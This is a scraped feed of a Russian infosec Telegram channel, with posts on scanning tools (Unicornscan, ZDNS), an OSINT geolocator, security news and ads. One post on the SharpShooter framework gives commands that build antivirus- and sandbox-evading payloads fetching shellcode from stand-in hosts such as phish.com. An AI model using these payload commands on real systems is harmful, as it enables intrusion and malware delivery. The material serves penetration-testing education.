Codeby
36.3K subscribers
1.93K photos
95 videos
12 files
7.72K links
Блог сообщества Кодебай

Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.school
Пентест: codeby.one
CTF: hackerlab.pro

VK: vk.com/codeby
YT: clck.ru/XG99c

Сотрудничество: @KinWiz

Реклама: @Savchenkova_Valentina
Download Telegram
Unicornscan: Высокоскоростной асинхронный сканер для сетевой разведки

Unicornscan — это асинхронный инструмент для сетевой разведки и аудита безопасности, предназначенный для быстрой доставки сетевых стимулов и записи ответов. Его ключевое отличие от традиционных сканеров (таких как Nmap) — асинхронная, масштабируемая архитектура, позволяющая достигать высокой скорости сканирования (25.000+ пакетов в секунду), что делает его отличным выбором для обследования больших сетей.


🔘 Ключевые особенности и преимущества
- Отдельные процессы для отправки и прослушивания пакетов позволяют достигать высокой скорости и эффективности
- Поддержка TCP (SYN, ACK, FIN, NULL, XMAS, произвольные флаги), UDP, ICMP, ARP-сканирования и составных режимов
- Встроенная поддержка сигнатур p0f v3 для анализа характеристик TCP/IP стека и определения операционной системы удалённого хоста (более 50 отпечатков)
- Возможность эмулировать поведение TCP/IP стека различных ОС (Linux, Windows, macOS и др.) при отправке пакетов для обхода простых систем обнаружения
- Для UDP-сканирования может отправлять специфичные для служб пакеты (DNS, HTTP, SIP, SSDP), повышая точность обнаружения

➡️ Установка
sudo apt install unicornscan

Проверка
unicornscan -h


➡️ Базовый TCP SYN-скан
sudo unicornscan -mT -p 1-1024 -I -E -vvv 192.168.1.100

Команда выполнит подробное TCP SYN-сканирование портов с 1 по 1024 на хосте 192.168.1.100 с немедленным выводом в реальном времени, обработкой всех типов ответов (открытые, закрытые, фильтруемые порты) и максимальной детализацией технических параметров сетевых пакетов

➡️ Быстрый порт-сканинг с указанием интерфейса и TTL
sudo unicornscan -i eth0 -r 2000 -t 64 -p a 10.0.0.0/24

Команда выполнит быстрое сканирование всех 65 тысяч портов на всех хостах в сети 10.0.0.0/24, используя сетевой интерфейс eth0, со скоростью 2000 пакетов в секунду и значением TTL 64 для маскировки под стандартный Linux-трафик

➡️ TCP-сканирование с записью трафика для последующего анализа
unicornscan -mTsFPU -s r -w scan_capture.pcap -p 22,80,443 192.168.1.50

Команда выполнит нестандартное TCP-сканирование с флагами FIN, PSH и URG (без SYN) портов 22, 80 и 443 на хосте 192.168.1.50, используя случайные исходные порты и сохраняя все полученные ответные пакеты в файл scan_capture.pcap для последующего сетевого анализа

➡️ Ограничения
- Unicornscan создан для быстрого сбора данных (открытые порты, живые хосты, ОС). Он не заменяет полноценные сканеры уязвимостей или сложные скриптовые движки, такие как у Nmap
- Интерпретация вывода, особенно в детальном режиме, требует понимания сетевых протоколов
- Для сканирования интернет-хостов составные режимы с ARP (-mA+...) не работают, так как требуют нахождения в одном широковещательном домене (L2)

#tools #audit #scanner #TCP #UDP #SYN

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
11👍6🔥6
Codeby pinned a photo
Сегодня ИБ — это не только политики и регламенты, но и автоматизация.
Python помогает решать задачи эффективнее и масштабнее.

Какие библиотеки используете вы? Пишите в комментариях ⬇️

Для тех, кто только начинает свой путь в автоматизации ИБ, отличным стартом станет курс «Основы программирования на Python». Начните обучение 19 января.

#python #автоматизация #libs

Все наши каналы 💬Все наши чаты Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥116🤗4👍3👎1
🦈 SharpShooter

Фреймворк для создания полезных нагрузок, предназначенный для загрузки и выполнения произвольного исходного кода на C#. Инструмент может создавать полезные нагрузки в различных форматах, включая HTA, JS, VBS и WSF. Используется DotNetToJavaScript для вызова методов из сериализованного .NET-объекта SharpShooter.

Полезные нагрузки можно получать через веб или DNS, либо через оба канала одновременно. Также возможна генерация stageless полезных нагрузок со встроенным выполнением шелл-кода.

Созданные полезные нагрузки шифруются алгоритмом RC4 со случайным ключом для базового обхода антивирусов. Фреймворк также включает возможности обнаружения песочниц и привязки к окружению для повышения скрытности.

Поддерживает возможность упаковывать полезную нагрузку в HTML-файл с использованием техники Demiguise HTML smuggling.

⚡️ Установка
git clone https://github.com/mdsecactivebreach/SharpShooter.git
cd SharpShooter
pip3 install -r requirements.txt


🦇 Использование
1️⃣Создание JavaScript-полезной нагрузки без этапов выполнения, ориентированной на версию 4 платформы .NET. В данном примере создаётся полезная нагрузка с именем foo.js в выходной директории. Шелл-код считывается из файла ./raw.txt. Полезная нагрузка пытается обеспечить обход песочницы путём привязки выполнения к домену CONTOSO и проверки на наличие известных артефактов виртуальных машин.
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3


2️⃣Создаётся VBS-полезная нагрузка, которая осуществляет доставку как через Web, так и через DNS. Полезная нагрузка попытается загрузить сжатый C#-файл, выполняющий шелл-код в файле csharpsc.txt.
SharpShooter.py --payload vbs --delivery both --output foo --web https://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4


3️⃣Далее показано, как создать промежуточную полезную нагрузку JS, которая выполняет веб-доставку и получает полезную нагрузку с https://www.phish.com/implant.payload. Сгенерированная полезная нагрузка попытается обойти песочницу и скомпилировать полученную полезную нагрузку.
SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com outlook --awlurl https://192.168.2.8:8080/foo.xsl


4️⃣Создаётся макрос VBA, который использует COM-интерфейс XMLDOM для получения и выполнения размещённой таблицы стилей.
SharpShooter.py --stageless --dotnetver 2 --payload macro --output foo --rawscfile ./x86payload.bin --com xslremote --awlurl https://192.168.2.8:8080/foo.xsl


P.S. Используйте этот инструмент только в образовательных целях!

#tools #payload #SharpShooter

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
11👍6🔥5
Forwarded from Hacker Lab
🚩 Новые задания на платформе HackerLab!

🕵️ Категория ФорензикаСледопыт

🎢 Категория РазноеAPT

Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11🔥76
💫 Перед вами — четыре снимка с мест событий, собранные в одно дело. Сможете вычислить угрозу?

1. Какой термин скрывается за этими кадрами?
2. Какой его главный и самый опасный принцип?

Включайте режим сыска. Сопоставляйте улики, стройте версии. Ваши теории ждём в комментариях!💻

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
👍114🔥3🤔3🍌1🙈1💅1
GEOLOCATOR_ULTIMATE

Это инструмент геолокации, написанный на Python, который использует множество источников информации и сопоставляет данные из различных источников.
это продвинутый инструмент геолокации, который объединяет более 20 различных источников для определения физического местоположения IP-адреса или домена. Этот инструмент предназначен для специалистов по безопасности, исследователей, придерживающихся этических норм, и сетевых команд.

📕Характиристика:
1️⃣Автономная база данных (MaxMind GeoLite2)
2️⃣Расширенный анализ консенсуса
3️⃣Выявление угроз и репутации
4️⃣Генерация отчетов в формате JSON
5️⃣Интуитивно понятный интерфейс терминала

💻Установка:
git clone https://github.com/hackermexico/geolocator_ultimate.git

cd geolocator_ultimate/


📌Запуск:
Запуск с доменом или IP:
python3 geoultimate.py <TAGRGET>

Сохранить вывод в JSON:
python3 geoultimate.py <TAGRGET> --save


#tools #osint

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14👍75🙈1
❗️РКН будет фильтровать трафик с помощью ИИ

Роскомнадзор (РКН) планирует создать и внедрить механизм фильтрации интернет-трафика с использованием инструментов машинного обучения в этом году. На эти цели выделят 2,27 млрд рублей, следует из плана цифровизации РКН, который направлен правкомиссии по цифровому развитию. По мнению экспертов, с помощью таких инструментов РКН может научиться эффективнее блокировать запрещенные ресурсы, а также ограничивать работу VPN-сервисов.

С помощью ТСПУ уже заблокировано более 1 млн запрещенных в России ресурсов. За день ТСПУ ограничивает доступ в среднем к 5500 новых сетевых адресов и доменов, рассказывал в интервью «Известям» замглавы РКН Олег Терляков в июне 2025 года.

Инструменты машинного обучения на ТСПУ могут использоваться для разработки и автоматического применения правил фильтрации трафика, не исключает эксперт организации RKS-Global, пожелавший остаться анонимным: например, чтобы находить и блокировать трафик VPN-сервисов. Кроме того, полагает он, такие инструменты позволяют осуществлять поиск по текстам на разных языках и по изображениям и видео: «Так, Китай уже вовсю использует ИИ в мониторинге интернета».

Впрочем, не для всех систем РКН применение ИИ оказалось одинаково действенным. Так, в системе мониторинга использования персональных данных в интернете служба тестировала нейросети, но, по признанию замруководителя РКН Милоша Вагнера, их эффективность оказалась не так высока: «В тестовом режиме посмотрели на работу нейросетей, оценили их результативность в 60%. <…> Чтобы ожидаемая точность анализа повысилась <…>, нужно было составить обучающие датасеты по объемам, превосходящим мониторинг всех сайтов, который Роскомнадзор проводил за несколько лет. Такие трудозатраты в условиях необходимости экономии средств мы сочли на этом этапе преждевременными».

Источник: https://www.forbes.ru/tekhnologii/553640-algoritmiceskie-upraznenia-rkn-budet-fil-trovat-trafik-s-pomos-u-masinnogo-obucenia

#news #ркн #vpn #ии

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
👎32🤬126😢5💔3😨3🤩2🗿2👍1
Сборная России поедет в Австралию защищать чемпионский титул по кибербезопасности

Российские старшеклассники примут участие в Международной олимпиаде по кибербезопасности, которая пройдет с 27 июня по 2 июля в Сиднее. Подготовкой команды, как и в прошлом году, займутся эксперты Центрального университета и «Лаборатории Касперского».

Напомним, что в 2025 году их усилия принесли блестящий результат: на первой такой олимпиаде в Сингапуре российская сборная завоевала абсолютный комплект наград — 8 медалей из 8 возможных.

Сейчас идет формирование новой команды. К отбору приглашают школьников от 14 лет, увлеченных информационной безопасностью. Регистрация продлится до 7 февраля, после чего кандидатов ждут онлайн-испытания и очные туры.

У сборной России будет шанс повторить прошлогодний триумф на мировой арене.

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2012👍8👎1
Освойте UserGate и повысьте уровень защиты своей ИТ-инфраструктуры!

Бесплатный онлайн-курс поможет вам шаг за шагом освоить внедрение и настройку UserGate — без лишней теории, с упором на практику.

В программе курса:
Настройка сетевых зон, NAT, VPN, кластеров, фильтрации на уровне приложений и правил межсетевого экрана
Интеграция с LDAP и Active Directory, фильтрация контента, системы обнаружения вторжений и обратный прокси
Пошаговые видеоуроки, практические упражнения и итоговое тестирование

По завершении курса Вы получите:
именной сертификат
📕 PDF-инструкции
📋 чек-листы и готовые конфигурации, которые помогут в дальнейшей работе

Пройдите курс в удобное время — запись уже доступна.

Реклама. ООО "ИНФРАТЕХ". ИНН 5024197250
9👍7🔥5😁5
Ваша ИТ-безопасность — это вы. И сегодня это самое уязвимое место.

Атаки стали точечными. Цель — не ваш компьютер, а конкретно вы: ваши данные для шантажа, доступ для мошенничества, ресурсы для скрытого майнинга.

В статье — разбор реальных векторов атаки и как их предотвратить:
⏺️Фишинг, который невозможно отличить от письма коллеги.
⏺️Уязвимости в привычном ПО, которые вы забыли обновить.
⏺️Социнженерия, где ваша вежливость становится оружием против вас.

👉Мы подготовили чек-лист по настройке базовой защиты, рекомендации по выбору EDR-решений для дома и стратегию резервного копирования, которая переживет любую ransomware-атаку.

Узнайте ➡️ в статье, как обезопасить свой компьютер и данные раз и навсегда.

#Ransomware #РезервноеКопирование #ЗащитаДанных #CodebyNet

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
113👍8🔥6🙈2🙊2👎1🙉1
⚡️ ZDNS — высокоскоростной DNS-резолвер и утилита командной строки для выполнения крупномасштабных измерений DNS. Написан на языке Go и содержит собственный код рекурсивного разрешения и кэш, оптимизированный для поиска разнообразных наборов имен.

💻 Установка
git clone https://github.com/zmap/zdns.git
cd zdns
make install


Состоит из следующих типов модулей:
🔴Модули Raw DNS предоставляют необработанный DNS-ответ от сервера, аналогичный dig, но в формате JSON. Существует модуль практически для каждого типа DNS-записи.
A, AAAA, AFSDB, ANY, ATMA, AVC, AXFR, BINDVERSION, CAA, CDNSKEY, CDS, CERT, CNAME, CSYNC, DHCID, DMARC, DNSKEY, DS, EID, EUI48, EUI64, GID, GPOS, HINFO, HIP, HTTPS, ISDN, KEY, KX, L32, L64, LOC, LP, MB, MD, MF, MG, MR, MX, NAPTR, NID, NINFO, NS, NSAPPTR, NSEC, NSEC3, NSEC3PARAM, NSLOOKUP, NULL, NXT, OPENPGPKEY, PTR, PX, RP, RRSIG, RT, SVCBS, MIMEA, SOA, SPF, SRV, SSHFP, TALINK, TKEY, TLSA, TXT, UID, UINFO, UNSPEC, URI.

🔴Модули Lookup предоставляют более полезные ответы, когда требуется несколько запросов (например, выполнение дополнительного A поиска для IP-адресов, если получен NS в NSLOOKUP).
🔴Модули Misc предоставляют другие дополнительные средства запроса серверов (например, bind.version).

🔺Использование
Инструмент состоит из библиотеки рекурсивного резолвера и оболочки CLI.

1️⃣Raw DNS - echo "censys.io" | zdns A
В выводе для данной команды будет содержаться следующая информация:
{
"name": "censys.io",
"results": {
"A": {
"data": {
"additionals": [
{
"flags": "",
"type": "EDNS0",
"udpsize": 512,
"version": 0
}
],
"answers": [
{
"answer": "104.18.10.85",
"class": "IN",
"name": "censys.io",
"ttl": 300,
"type": "A"
},
{
"answer": "104.18.11.85",
"class": "IN",
"name": "censys.io",
"ttl": 300,
"type": "A"
}
],
"protocol": "udp",
"resolver": "[2603:6013:9d00:3302::1]:53"
},
"duration": 0.285295416,
"status": "NOERROR",
"timestamp": "2024-08-23T13:12:43-04:00"
}
}
}


2️⃣ Модуль Lookup. Необработанные DNS-ответы часто не содержат нужных данных. Например, ответ MX может не включать связанные A записи в дополнительном разделе, что требует дополнительного поиска. Для устранения этого недостатка инструмент также предоставляет несколько модулей поиска: alookup, mxlookup, nslookup.

🔴alookup работает аналогично nslookup и отслеживает записи CNAME.
🔴mxlookup дополнительно выполняет поиск A для IP-адресов, соответствующих записи обмена.
🔴nslookup дополнительно выполняет поиск A/AAAA для IP-адресов, соответствующих записи NS.
echo "censys.io" | zdns mxlookup --ipv4-lookup

В выводе для данной команды будет содержаться следующая информация:
{
"name": "censys.io",
"results": {
"MXLOOKUP": {
"data": {
"exchanges": [
{
"class": "IN",
"ipv4_addresses": [
"209.85.202.27"
],
"name": "alt1.aspmx.l.google.com",
"preference": 5,
"ttl": 300,
"type": "MX"
},
{
"class": "IN",
"ipv4_addresses": [
"142.250.31.26"
],
"name": "aspmx.l.google.com",
"preference": 1,
"ttl": 300,
"type": "MX"
}
]
},
"duration": 0.154786958,
"status": "NOERROR",
"timestamp": "2024-08-23T13:10:11-04:00"
}
}
}


#tools #DNS #resolver

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
15🔥7👍3🤗3
❗️ Уязвимость в Python библиотеке для ИИ

🪧 В библиотеках Python с открытым исходным кодом для искусственного интеллекта, выпущенных Apple (FlexTok), NVIDIA (NeMo) и Salesforce (Uni2TS), обнаружены уязвимости, позволяющие удаленное выполнение кода (RCE) при загрузке файла модели со вредоносными данными.

🧾 «Уязвимости возникают из-за того, что библиотеки используют метаданные для настройки сложных моделей и конвейеров, где используемая сторонняя библиотека создает экземпляры классов, используя эти метаданные. Уязвимые версии этих библиотек просто выполняют предоставленные данные как код. Это позволяет злоумышленнику внедрить произвольный код в метаданные модели, который будет автоматически выполняться при загрузке этих модифицированных моделей уязвимыми библиотеками», — заявило подразделение 42 Palo Alto Networks

💻 Речь идет о сторонней библиотеке Hydra от Meta, а именно о функции «hydra.utils.instantiate()», которая позволяет запускать код с использованием функций Python, таких как os.system(), builtins.eval() и builtins.exec().

🔎 Уязвимости, отслеживаемые как CVE-2025-23304 (NVIDIA) и CVE-2026-22584 (Salesforce), были устранены соответствующими компаниями

А вы используете эти библиотеки в работе?

#python #ai #cve #hydra

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
7👍6🔥5